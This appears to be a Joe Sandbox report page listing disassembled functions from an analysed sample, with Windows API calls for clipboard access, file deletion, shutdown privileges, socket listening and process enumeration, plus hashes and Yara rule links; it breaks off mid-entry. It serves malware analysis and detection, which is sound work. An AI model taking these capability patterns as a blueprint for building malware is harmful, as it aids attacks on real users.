Associated: 00000000.00000002.1428853631.0000000000B20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1429000684.0000000000BAF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1429000684.0000000000BD4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1429084075.0000000000BDE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1429109567.0000000000BE7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b20000_WBI835q8qr.jbxd

Similarity

API ID: Variant$ClearCreateFromInitInitializeInstanceStringUninitialize__itow__swprintf
String ID: Failed to create object$Invalid parameter$NULL Pointer assignment
API String ID: 834269672-1287834457
Opcode ID: 547d373769c5e3784fb907dd0882d677f559bacb79e81e998fd544dd446c39e7
Instruction ID: 8c0ed14df973451cbb9306b1ad16fa395f3792704905edae8cef0e43ac63a808
Opcode Fuzzy Hash: 547d373769c5e3784fb907dd0882d677f559bacb79e81e998fd544dd446c39e7
Instruction Fuzzy Hash: D761C1706083129FCB10DF64D885F6AB7E4EF5A754F0044A9F9859B3A1DB70ED48CB92

Function 00B94164 Relevance: 15.1, APIs: 10, Instructions: 83clipboardmemoryCOMMON

Download Yara Rule

APIs

OpenClipboard.USER32 ref: 00B9418B
EmptyClipboard.USER32 ref: 00B94191
GlobalAlloc.KERNEL32(00000002,?), ref: 00B941A6
CloseClipboard.USER32 ref: 00B94245

Memory Dump Source

Source File: 00000000.00000002.1428889580.0000000000B21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B20000, based on PE: true

Associated: 00000000.00000002.1428853631.0000000000B20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1429000684.0000000000BAF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1429000684.0000000000BD4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1429084075.0000000000BDE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1429109567.0000000000BE7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b20000_WBI835q8qr.jbxd

Similarity

API ID: Clipboard$AllocCloseEmptyGlobalOpen
String ID:
API String ID: 1737998785-0
Opcode ID: 7b4809eaea56c3102f158d29f5ab298874cd7654de996bf14c84335cf95a94c0
Instruction ID: eb0c8a2d2efa431612de495bfa8b90aba55543ee264b8dce3758d67ff40624db
Opcode Fuzzy Hash: 7b4809eaea56c3102f158d29f5ab298874cd7654de996bf14c84335cf95a94c0
Instruction Fuzzy Hash: 082191352006119FDB14AF64EC4AFB97BE8FF05751F1480A5F9499B2A1DF30AD01CB54

Function 00B837EF Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 167fileCOMMON

Download Yara Rule

APIs

Part of subcall function 00B24750: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00B24743,?,?,00B237AE,?), ref: 00B24770

Part of subcall function 00B84A31: GetFileAttributesW.KERNEL32(?,00B8370B), ref: 00B84A32

FindFirstFileW.KERNEL32(?,?), ref: 00B838A3
DeleteFileW.KERNEL32(?,?,00000000,?,?,?,?), ref: 00B8394B
MoveFileW.KERNEL32(?,?), ref: 00B8395E
DeleteFileW.KERNEL32(?,?,?,?,?), ref: 00B8397B
FindNextFileW.KERNEL32(00000000,00000010), ref: 00B8399D
FindClose.KERNEL32(00000000,?,?,?,?), ref: 00B839B9

Strings

\*.*, xrefs: 00B8384E, 00B83857, 00B8386C

Memory Dump Source

Source File: 00000000.00000002.1428889580.0000000000B21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B20000, based on PE: true

Associated: 00000000.00000002.1428853631.0000000000B20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1429000684.0000000000BAF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1429000684.0000000000BD4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1429084075.0000000000BDE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1429109567.0000000000BE7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b20000_WBI835q8qr.jbxd

Similarity

API ID: File$Find$Delete$AttributesCloseFirstFullMoveNameNextPath
String ID: \*.*
API String ID: 4002782344-1173974218
Opcode ID: b3f35352fa68ca9122fac8943722fa967bdf31ed35e8e3b1241d285133a389f7
Instruction ID: 8ffdf3ac60748868466cb9064f80a2513ad22c86f7087225da4dd894539f0e11
Opcode Fuzzy Hash: b3f35352fa68ca9122fac8943722fa967bdf31ed35e8e3b1241d285133a389f7
Instruction Fuzzy Hash: B1515C3180515DAACF15FBA0E9929EDB7F9AF15700F6000E9E44A771A1EF316F09CB64

Function 00B8F3F3 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 120filesleepCOMMON

Download Yara Rule

APIs

Part of subcall function 00B27DE1: _memmove.LIBCMT ref: 00B27E22

FindFirstFileW.KERNEL32(?,?,*.*,?,?,00000000,00000000), ref: 00B8F440
Sleep.KERNEL32(0000000A), ref: 00B8F470
_wcscmp.LIBCMT ref: 00B8F484
_wcscmp.LIBCMT ref: 00B8F49F
FindNextFileW.KERNEL32(?,?), ref: 00B8F53D
FindClose.KERNEL32(00000000), ref: 00B8F553

Strings

*.*, xrefs: 00B8F425

Memory Dump Source

Source File: 00000000.00000002.1428889580.0000000000B21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B20000, based on PE: true

Associated: 00000000.00000002.1428853631.0000000000B20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1429000684.0000000000BAF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1429000684.0000000000BD4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1429084075.0000000000BDE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1429109567.0000000000BE7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b20000_WBI835q8qr.jbxd

Similarity

API ID: Find$File_wcscmp$CloseFirstNextSleep_memmove
String ID: *.*
API String ID: 713712311-438819550
Opcode ID: 727e5dbc454a4046884c98c831f7b6be2367b6fd5cf16dce105a9edf6e203d43
Instruction ID: d9ddf3e57f74ef6c8446bac399390068083393fdfb73e75935a4dff96fc50093
Opcode Fuzzy Hash: 727e5dbc454a4046884c98c831f7b6be2367b6fd5cf16dce105a9edf6e203d43
Instruction Fuzzy Hash: 56414E7194421A9FCF14EFA4DC45AFEBBF4FF15310F1445AAE819A32A1EB309A85CB50

Function 00B35760 Relevance: 11.0, APIs: 7, Instructions: 532COMMON

Download Yara Rule

APIs

_memmove.LIBCMT ref: 00B358A5
_memmove.LIBCMT ref: 00B358F5
_memmove.LIBCMT ref: 00B3595B

Memory Dump Source

Source File: 00000000.00000002.1428889580.0000000000B21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B20000, based on PE: true

Associated: 00000000.00000002.1428853631.0000000000B20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1429000684.0000000000BAF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1429000684.0000000000BD4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1429084075.0000000000BDE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1429109567.0000000000BE7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b20000_WBI835q8qr.jbxd

Similarity

API ID: _memmove
String ID:
API String ID: 4104443479-0
Opcode ID: 7b12d48ecfdd44ca8d541193635330f316b9d10535db840a5a0dab008e36f36d
Instruction ID: c1e9fb115d29bb298cbd7960bbe2029e1d0a851cc9d53290fb0c45b6bae64271
Opcode Fuzzy Hash: 7b12d48ecfdd44ca8d541193635330f316b9d10535db840a5a0dab008e36f36d
Instruction Fuzzy Hash: 20129C70A00619DFDF14DFA5D981AAEB7F5FF48300F2085AAE81AE7250EB35AD14CB51

Function 00B83B12 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 91fileCOMMON

Download Yara Rule

APIs

Part of subcall function 00B24750: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00B24743,?,?,00B237AE,?), ref: 00B24770

Part of subcall function 00B84A31: GetFileAttributesW.KERNEL32(?,00B8370B), ref: 00B84A32

FindFirstFileW.KERNEL32(?,?), ref: 00B83B89
DeleteFileW.KERNEL32(?,?,?,?), ref: 00B83BD9
FindNextFileW.KERNEL32(00000000,00000010), ref: 00B83BEA
FindClose.KERNEL32(00000000), ref: 00B83C01
FindClose.KERNEL32(00000000), ref: 00B83C0A

Strings

\*.*, xrefs: 00B83B5B

Memory Dump Source

Source File: 00000000.00000002.1428889580.0000000000B21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B20000, based on PE: true

Associated: 00000000.00000002.1428853631.0000000000B20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1429000684.0000000000BAF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1429000684.0000000000BD4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1429084075.0000000000BDE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1429109567.0000000000BE7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b20000_WBI835q8qr.jbxd

Similarity

API ID: FileFind$Close$AttributesDeleteFirstFullNameNextPath
String ID: \*.*
API String ID: 2649000838-1173974218
Opcode ID: c19d20b14de7c1a12eecdc7506d238745e64b8e7978cf197d68bab7dbb7bb3f5
Instruction ID: 426b52925603f06d3a69331a5416e5e12635aaf3bef726070653912f9e463b46
Opcode Fuzzy Hash: c19d20b14de7c1a12eecdc7506d238745e64b8e7978cf197d68bab7dbb7bb3f5
Instruction Fuzzy Hash: 0F316D310083959BC301FF64D8919AFB7E8AE96714F404DADF4D9931A1EF219A09CB66

Function 00B851BD Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 59shutdownCOMMON

Download Yara Rule

APIs

Part of subcall function 00B787E1: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 00B7882B
Part of subcall function 00B787E1: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 00B78858
Part of subcall function 00B787E1: GetLastError.KERNEL32 ref: 00B78865

ExitWindowsEx.USER32(?,00000000), ref: 00B851F9

Strings

@, xrefs: 00B851EC
, xrefs: 00B851E7
SeShutdownPrivilege, xrefs: 00B851C9

Memory Dump Source

Source File: 00000000.00000002.1428889580.0000000000B21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B20000, based on PE: true

Associated: 00000000.00000002.1428853631.0000000000B20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1429000684.0000000000BAF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1429000684.0000000000BD4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1429084075.0000000000BDE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1429109567.0000000000BE7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b20000_WBI835q8qr.jbxd

Similarity

API ID: AdjustErrorExitLastLookupPrivilegePrivilegesTokenValueWindows
String ID: $@$SeShutdownPrivilege
API String ID: 2234035333-194228
Opcode ID: 9b5de4d9abca2e04a8d6eb7ef55a52d778e13d87c7b180b4bb61d544ddbd68ac
Instruction ID: f13b1a6107708c84240629bb2f3e5c45f0aee928164a6969d91c959b7be550fd
Opcode Fuzzy Hash: 9b5de4d9abca2e04a8d6eb7ef55a52d778e13d87c7b180b4bb61d544ddbd68ac
Instruction Fuzzy Hash: 2601F7316916166BEB387E689C8BFFAB2D8EB05741F2004E1F957E20F2DD511C00C7A0

Function 00B96283 Relevance: 9.1, APIs: 6, Instructions: 84networkCOMMON

Download Yara Rule

APIs

socket.WSOCK32(00000002,00000001,00000006,?,00000002,00000000), ref: 00B962DC
WSAGetLastError.WSOCK32(00000000), ref: 00B962EB
bind.WSOCK32(00000000,?,00000010), ref: 00B96307
listen.WSOCK32(00000000,00000005), ref: 00B96316
WSAGetLastError.WSOCK32(00000000), ref: 00B96330
closesocket.WSOCK32(00000000,00000000), ref: 00B96344

Memory Dump Source

Source File: 00000000.00000002.1428889580.0000000000B21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B20000, based on PE: true

Associated: 00000000.00000002.1428853631.0000000000B20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1429000684.0000000000BAF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1429000684.0000000000BD4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1429084075.0000000000BDE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1429109567.0000000000BE7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b20000_WBI835q8qr.jbxd

Similarity

API ID: ErrorLast$bindclosesocketlistensocket
String ID:
API String ID: 1279440585-0
Opcode ID: 01ebfe9ab4f01c21ef784019fb9cc58d2235868b1fb03efca77028704a015f02
Instruction ID: edc828368d482c63f74d37b7aa60182ddf4e84b844535e51be4b108226a2a323
Opcode Fuzzy Hash: 01ebfe9ab4f01c21ef784019fb9cc58d2235868b1fb03efca77028704a015f02
Instruction Fuzzy Hash: 1721A271600215AFCF10EF68D886B7EB7E9EF45720F1481A9E85AA73D1CB70AD41CB51

Function 00B35520 Relevance: 8.0, APIs: 5, Instructions: 516COMMON

Download Yara Rule

APIs

Part of subcall function 00B40DB6: std::exception::exception.LIBCMT ref: 00B40DEC
Part of subcall function 00B40DB6: __CxxThrowException@8.LIBCMT ref: 00B40E01

_memmove.LIBCMT ref: 00B70258
_memmove.LIBCMT ref: 00B7036D
_memmove.LIBCMT ref: 00B70414

Memory Dump Source

Source File: 00000000.00000002.1428889580.0000000000B21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B20000, based on PE: true

Associated: 00000000.00000002.1428853631.0000000000B20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1429000684.0000000000BAF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1429000684.0000000000BD4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1429084075.0000000000BDE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1429109567.0000000000BE7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b20000_WBI835q8qr.jbxd

Similarity

API ID: _memmove$Exception@8Throwstd::exception::exception
String ID:
API String ID: 1300846289-0
Opcode ID: ab066f0ff166c3888ed477b3b6f6e4e88b578a3b48ffb372ff18c99334ab341e
Instruction ID: 0d10875ebd20effcf0d531efd39bae4732c385ccac072ffb3a2fcc86fdc91974
Opcode Fuzzy Hash: ab066f0ff166c3888ed477b3b6f6e4e88b578a3b48ffb372ff18c99334ab341e
Instruction Fuzzy Hash: B302B370E10209DBCF14EF64D981AAEB7F5EF44300F6580AAE809DB355EB31DA54CB95

Function 00B21287 Relevance: 7.9, APIs: 5, Instructions: 379COMMON

Download Yara Rule

APIs

Part of subcall function 00B22612: GetWindowLongW.USER32(?,000000EB), ref: 00B22623

DefDlgProcW.USER32(?,?,?,?,?), ref: 00B219FA
GetSysColor.USER32(0000000F), ref: 00B21A4E
SetBkColor.GDI32(?,00000000), ref: 00B21A61

Part of subcall function 00B21290: DefDlgProcW.USER32(?,00000020,?), ref: 00B212D8

Memory Dump Source

Source File: 00000000.00000002.1428889580.0000000000B21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B20000, based on PE: true

Associated: 00000000.00000002.1428853631.0000000000B20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1429000684.0000000000BAF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1429000684.0000000000BD4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1429084075.0000000000BDE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1429109567.0000000000BE7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b20000_WBI835q8qr.jbxd

Similarity

API ID: ColorProc$LongWindow
String ID:
API String ID: 3744519093-0
Opcode ID: 7af01d5f1c1c8d5baabe8267bd10072db0421c9a7add77363ed6509bde4d024d
Instruction ID: 8fc3f4e985ba61d17ae41547009f1bbde2086aa85fccbb5b2bb60a6997e968a1
Opcode Fuzzy Hash: 7af01d5f1c1c8d5baabe8267bd10072db0421c9a7add77363ed6509bde4d024d
Instruction Fuzzy Hash: ACA17B711065A4BAD738AB2C6CC5FBF35DCDF63342B1409D9F91AD6192CF228D4192B2

Function 00B8BCBC Relevance: 7.6, APIs: 5, Instructions: 143fileCOMMON

Download Yara Rule

APIs

FindFirstFileW.KERNEL32(?,?), ref: 00B8BCE6
_wcscmp.LIBCMT ref: 00B8BD16
_wcscmp.LIBCMT ref: 00B8BD2B
FindNextFileW.KERNEL32(00000000,?), ref: 00B8BD3C
FindClose.KERNEL32(00000000,00000001,00000000), ref: 00B8BD6C

Memory Dump Source

Source File: 00000000.00000002.1428889580.0000000000B21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B20000, based on PE: true

Associated: 00000000.00000002.1428853631.0000000000B20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1429000684.0000000000BAF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1429000684.0000000000BD4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1429084075.0000000000BDE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1429109567.0000000000BE7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b20000_WBI835q8qr.jbxd

Similarity

API ID: Find$File_wcscmp$CloseFirstNext
String ID:
API String ID: 2387731787-0
Opcode ID: fc463aa5672dff397d0f7ccd5b1fe0cb85a656ea2fbbcc1bbbd51b9cf8f95414
Instruction ID: 158918d773e4c4baa6e90f6940a9e5468a5fc75963ba37cac1fad3a9945dfe76
Opcode Fuzzy Hash: fc463aa5672dff397d0f7ccd5b1fe0cb85a656ea2fbbcc1bbbd51b9cf8f95414
Instruction Fuzzy Hash: 19517F35604612AFC714EF68D4D1EAAB3E4EF49320F1446ADF9698B3A1DB30ED05CB91

Function 00B96747 Relevance: 7.6, APIs: 5, Instructions: 141networkCOMMON

Download Yara Rule

APIs

Part of subcall function 00B97D8B: inet_addr.WSOCK32(00000000,?,00000000,?,?,?,00000000), ref: 00B97DB6

socket.WSOCK32(00000002,00000002,00000011,?,?,00000000), ref: 00B9679E
WSAGetLastError.WSOCK32(00000000), ref: 00B967C7
bind.WSOCK32(00000000,?,00000010), ref: 00B96800
WSAGetLastError.WSOCK32(00000000), ref: 00B9680D
closesocket.WSOCK32(00000000,00000000), ref: 00B96821

Memory Dump Source

Source File: 00000000.00000002.1428889580.0000000000B21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B20000, based on PE: true

Associated: 00000000.00000002.1428853631.0000000000B20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1429000684.0000000000BAF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1429000684.0000000000BD4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1429084075.0000000000BDE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1429109567.0000000000BE7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b20000_WBI835q8qr.jbxd

Similarity

API ID: ErrorLast$bindclosesocketinet_addrsocket
String ID:
API String ID: 99427753-0
Opcode ID: f68496ac159b7fe3db2da7fc78ab479227e972344370e8f4d010c3895bf68764
Instruction ID: 498123622d4484cb17f7062f88a17aba4f7dd4676387073bfaee45220737bf2a
Opcode Fuzzy Hash: f68496ac159b7fe3db2da7fc78ab479227e972344370e8f4d010c3895bf68764
Instruction Fuzzy Hash: 6A41B175A00224AFDB10AF649C86F7E77E8EF05754F4485ACF91EAB3D2CA749D008792

Function 00BA5376 Relevance: 7.6, APIs: 5, Instructions: 69windowCOMMON

Download Yara Rule

APIs

IsWindowVisible.USER32 ref: 00BA53C5
IsWindowEnabled.USER32 ref: 00BA53D3
GetForegroundWindow.USER32(?,?,00000001), ref: 00BA53E0
IsIconic.USER32 ref: 00BA53EE
IsZoomed.USER32 ref: 00BA53FC

Memory Dump Source

Source File: 00000000.00000002.1428889580.0000000000B21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B20000, based on PE: true

Associated: 00000000.00000002.1428853631.0000000000B20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1429000684.0000000000BAF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1429000684.0000000000BD4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1429084075.0000000000BDE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1429109567.0000000000BE7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b20000_WBI835q8qr.jbxd

Similarity

API ID: Window$EnabledForegroundIconicVisibleZoomed
String ID:
API String ID: 292994002-0
Opcode ID: a07a96c83abb1cae7938a5f0d4cfddf8d20a4d216d5e5fd7b29da6545acea694
Instruction ID: 439fe8656a8b132e61af164dc416ad515cebfe681e8d8124c4e45970f40ac9d4
Opcode Fuzzy Hash: a07a96c83abb1cae7938a5f0d4cfddf8d20a4d216d5e5fd7b29da6545acea694
Instruction Fuzzy Hash: 771104317049216FDB305F269C45A6E7BD8FF867A1B0040A8F84AD7241CF70DE01C6A4

Function 00B780A9 Relevance: 7.5, APIs: 5, Instructions: 45memoryCOMMON

Download Yara Rule

APIs

GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 00B780C0
GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 00B780CA
GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 00B780D9
HeapAlloc.KERNEL32(00000000,?,00000002,?,00000000,?), ref: 00B780E0
GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 00B780F6

Memory Dump Source

Source File: 00000000.00000002.1428889580.0000000000B21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B20000, based on PE: true

Associated: 00000000.00000002.1428853631.0000000000B20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1429000684.0000000000BAF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1429000684.0000000000BD4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1429084075.0000000000BDE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1429109567.0000000000BE7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b20000_WBI835q8qr.jbxd

Similarity

API ID: HeapInformationToken$AllocErrorLastProcess
String ID:
API String ID: 44706859-0
Opcode ID: 83386917f705919a633288f6cfa000164dec804f6a45269799cac5a73a24ec38
Instruction ID: 53fdf8666cea7c82e2056cf8ea4a19d767ebfd68df8b1e0796c00a9f101fed33
Opcode Fuzzy Hash: 83386917f705919a633288f6cfa000164dec804f6a45269799cac5a73a24ec38
Instruction Fuzzy Hash: FEF04F31240205AFEB200FE5EC8EEB73BACEF4A755B404065F949D7150CF719C41DA60

Function 00B24B37 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 18libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(kernel32.dll,?,00B24AD0), ref: 00B24B45
GetProcAddress.KERNEL32(00000000,GetNativeSystemInfo), ref: 00B24B57

Strings

GetNativeSystemInfo, xrefs: 00B24B51
kernel32.dll, xrefs: 00B24B40

Memory Dump Source

Source File: 00000000.00000002.1428889580.0000000000B21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B20000, based on PE: true

Associated: 00000000.00000002.1428853631.0000000000B20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1429000684.0000000000BAF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1429000684.0000000000BD4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1429084075.0000000000BDE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1429109567.0000000000BE7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b20000_WBI835q8qr.jbxd

Similarity

API ID: AddressLibraryLoadProc
String ID: GetNativeSystemInfo$kernel32.dll
API String ID: 2574300362-192647395
Opcode ID: b744e71e6f2c39610a63ae26b395d25870dd0b63ccf33a804efe6a4fc247d5a9
Instruction ID: 56fe94df62b88d9f997b5035f0eafc2d110e525deb88830dc1aa573dd4485d4f
Opcode Fuzzy Hash: b744e71e6f2c39610a63ae26b395d25870dd0b63ccf33a804efe6a4fc247d5a9
Instruction Fuzzy Hash: 1CD01234A10723DFD7209FB1E859B9676E4EF06351B11887AD486D6560DB70D480CA64

Function 00B33030 Relevance: 6.6, APIs: 4, Instructions: 587COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1428889580.0000000000B21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B20000, based on PE: true

Associated: 00000000.00000002.1428853631.0000000000B20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1429000684.0000000000BAF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1429000684.0000000000BD4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1429084075.0000000000BDE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1429109567.0000000000BE7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b20000_WBI835q8qr.jbxd

Similarity

API ID: __itow__swprintf
String ID:
API String ID: 674341424-0
Opcode ID: cd8d9e1ace2bb6e076c4b2267b943a89283f7997689b980a6768ca292fc8dfb5
Instruction ID: 96234368d06d82deeb290be7825440007e133bd229e399a12cf4e01b35b48270
Opcode Fuzzy Hash: cd8d9e1ace2bb6e076c4b2267b943a89283f7997689b980a6768ca292fc8dfb5
Instruction Fuzzy Hash: D02298716083109FC724DF24D881B6BB7E4EF84710F2449ACF89A97391DB35EA44CB92

Function 00B9EE0D Relevance: 6.2, APIs: 4, Instructions: 164processCOMMON

Download Yara Rule

APIs

CreateToolhelp32Snapshot.KERNEL32 ref: 00B9EE3D
Process32FirstW.KERNEL32(00000000,?), ref: 00B9EE4B

Part of subcall function 00B27DE1: _memmove.LIBCMT ref: 00B27E22

Process32NextW.KERNEL32(00000000,?), ref: 00B9EF0B
CloseHandle.KERNEL32(00000000,?,?,?), ref: 00B9EF1A

Memory Dump Source

Source File: 00000000.00000002.1428889580.0000000000B21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B20000, based on PE: true

Associated: 00000000.00000002.1428853631.0000000000B20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1429000684.0000000000BAF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1429000684.0000000000BD4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1429084075.0000000000BDE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1429109567.0000000000BE7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b20000_WBI835q8qr.jbxd

Similarity

API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32_memmove
String ID:
API String ID: 2576544623-0
Opcode ID: bc4925fc0046939140489aa12066db610a267219b75bf14b1a5fa19dc8707606
Instruction ID: c577acf6f3e70a3e6dc2173d43f1f16e12b6525410107610f2a4e36feae539c2
Opcode Fuzzy Hash: bc4925fc0046939140489aa12066db610a267219b75bf14b1a5fa19dc8707606
Instruction Fuzzy Hash: 9851B071104711AFD720EF20DC82EABB7E8EF95750F40486DF499972A1EB30E908CB92

Function 00B2FCE0 Relevance: 5.5, APIs: 3, Instructions: 1040COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1428889580.0000000000B21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B20000, based on PE: true

Associated: 00000000.00000002.1428853631.0000000000B20000.00000002.00000001.01000000.00000003.sdmpDownload File
